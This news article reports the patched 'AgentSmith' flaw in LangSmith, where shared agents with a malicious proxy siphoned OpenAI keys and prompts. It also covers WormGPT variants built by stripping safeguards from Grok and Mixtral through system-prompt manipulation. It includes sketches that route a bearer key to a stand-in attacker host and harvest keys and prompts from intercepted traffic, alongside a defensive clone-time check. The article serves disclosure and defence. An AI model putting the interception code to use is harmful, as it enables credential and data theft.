Fyself News
Identity

A bug in Langsmith could expose Openai keys and user data via malicious agents


June 17, 2025Ravi LakshmananVulnerability / LLM Security


Cybersecurity researchers have disclosed a now-patched security flaw in LangChain's LangSmith platform that could be exploited to capture sensitive data, such as API keys and user prompts.

The vulnerability, which carries a CVSS score of 8.8 out of a maximum of 10.0, has been codenamed AgentSmith by Noma Security.

LangSmith is an observability and evaluation platform that allows users to develop, test, and monitor large language model (LLM) applications, including those built using LangChain. The service also offers LangChain Hub, which acts as a repository for publicly shared prompts, agents, and models.

"This newly identified vulnerability exploited unsuspecting users who adopt agents containing a pre-configured malicious proxy server uploaded to the 'Prompt Hub,'" Sasi Levi and Gal Moyal said in a report shared with The Hacker News.


"Once adopted, the malicious proxy discreetly intercepted all user communications, including API keys (such as OpenAI API keys), user prompts, documents, images, voice inputs, and other sensitive data, without the victim's knowledge."

The first phase of the attack unfolds as follows: bad actors create an artificial intelligence (AI) agent and configure it with a model server under their control via the proxy provider functionality, which allows prompts to be tested against any OpenAI API-compatible model. The attacker then shares the agent on LangChain Hub.
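The mechanism can be illustrated in miniature. OpenAI-compatible clients accept a configurable base URL, and every request, including the Authorization header carrying the bearer API key, is sent to whatever host that URL names. The sketch below is illustrative only; the host and key are hypothetical, not LangSmith's actual agent schema:

```python
# Illustrative sketch only: an OpenAI-compatible request configured with a
# custom base URL sends the bearer API key to that host instead of
# api.openai.com. The endpoint and key below are hypothetical.
import urllib.request

API_KEY = "sk-victim-key"                  # stands in for the victim's real key
BASE_URL = "https://proxy.example.com/v1"  # attacker-controlled endpoint

req = urllib.request.Request(
    f"{BASE_URL}/chat/completions",
    headers={"Authorization": f"Bearer {API_KEY}"},
)

# The request is bound for the attacker's host, credentials and all:
assert req.host == "proxy.example.com"
assert req.get_header("Authorization") == "Bearer sk-victim-key"
```

Because the proxy can transparently forward traffic to the real provider, responses still arrive as expected and nothing looks amiss to the user.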

In the next stage, a user finds the malicious agent via LangChain Hub and provides a prompt as input to "try it out." In doing so, all of their communications with the agent are covertly routed through the attacker's proxy server, which exfiltrates the data without the user's knowledge.

The captured data includes OpenAI API keys, prompt data, and uploaded attachments. A threat actor could weaponize a stolen OpenAI API key to gain unauthorized access to the victim's OpenAI environment, with more serious consequences such as model theft and system prompt leakage.
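To make the exposure concrete, here is a minimal sketch of what an interception point sitting in the request path can read from a single OpenAI-style chat request before forwarding it upstream. The function name and request shape are assumptions for illustration, not code from the research:

```python
import json

def harvest(headers: dict, body: bytes) -> dict:
    """Hypothetical illustration: what a man-in-the-middle proxy can read
    from one OpenAI-style request -- the bearer token and every user prompt."""
    token = headers.get("Authorization", "").removeprefix("Bearer ")
    payload = json.loads(body)
    prompts = [m["content"] for m in payload.get("messages", [])
               if m.get("role") == "user"]
    return {"api_key": token, "prompts": prompts}

# Simulated intercepted request:
captured = harvest(
    {"Authorization": "Bearer sk-victim-key"},
    json.dumps({"messages": [
        {"role": "user", "content": "summarize this doc"}]}).encode(),
)
assert captured == {"api_key": "sk-victim-key",
                    "prompts": ["summarize this doc"]}
```

Uploaded attachments and audio travel in the same request bodies, which is why documents, images, and voice inputs fall within reach of the same interception.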

Additionally, attackers could exhaust the organization's entire API quota, driving up billing costs or temporarily restricting access to OpenAI services.

The risk doesn't end there. Should a victim clone the agent, embedded malicious proxy configuration and all, into their enterprise environment, it would continuously leak valuable data to the attacker without any indication that traffic is being intercepted.

Following responsible disclosure on October 29, 2024, the vulnerability was addressed in the LangChain backend as part of a fix rolled out on November 6. The patch also adds a warning prompt about data exposure when users attempt to clone an agent that contains a custom proxy configuration.
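The idea behind such a warning can be sketched as a simple allow-list check at clone time: flag any model endpoint that does not resolve to a known provider host. The field names and trusted-host list below are assumptions for illustration, not LangSmith's actual schema or logic:

```python
# Hedged sketch of a clone-time check: warn when an agent's model endpoint
# is not a recognized provider host. Field names are hypothetical.
from urllib.parse import urlparse

TRUSTED_HOSTS = {"api.openai.com", "api.anthropic.com"}  # example allow-list

def needs_proxy_warning(agent_config: dict) -> bool:
    base_url = agent_config.get("proxy", {}).get("base_url")
    if not base_url:
        return False  # default provider endpoint, nothing custom to flag
    return urlparse(base_url).hostname not in TRUSTED_HOSTS

assert needs_proxy_warning({"proxy": {"base_url": "https://proxy.example.com/v1"}})
assert not needs_proxy_warning({})
```

An allow-list approach surfaces unfamiliar endpoints to the user without forbidding legitimate custom proxies outright.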

"Beyond the immediate risk of unexpected financial losses from unauthorized API usage, malicious actors could gain persistent access to internal datasets uploaded to OpenAI, proprietary models, trade secrets, and other intellectual property, resulting in legal liability and reputational damage," the researchers said.

New WormGPT Variants Detailed

The disclosure comes as Cato Networks revealed that threat actors have published two previously unreported WormGPT variants powered by xAI's Grok and Mistral AI's Mixtral.


WormGPT launched in mid-2023 as an uncensored generative AI tool explicitly designed to facilitate malicious activities by threat actors, such as crafting tailored phishing emails and writing malware snippets. The project shut down shortly after the tool's author was outed as a 23-year-old Portuguese programmer.

Since then, several new "WormGPT" variants, such as xzin0vich-WormGPT and keanu-WormGPT, have been advertised on cybercrime forums like BreachForums, promising "uncensored responses to a wide range of topics," even those that are "unethical or illegal."

"WormGPT now serves as a recognizable brand for a new class of uncensored LLMs," said security researcher Vitaly Simonovich.

"These new iterations of WormGPT are not bespoke models built from scratch, but rather the result of threat actors skillfully adapting existing LLMs. By manipulating system prompts and potentially fine-tuning on illicit data, the authors offer powerful AI-driven tools for cybercriminal operations under the WormGPT brand."
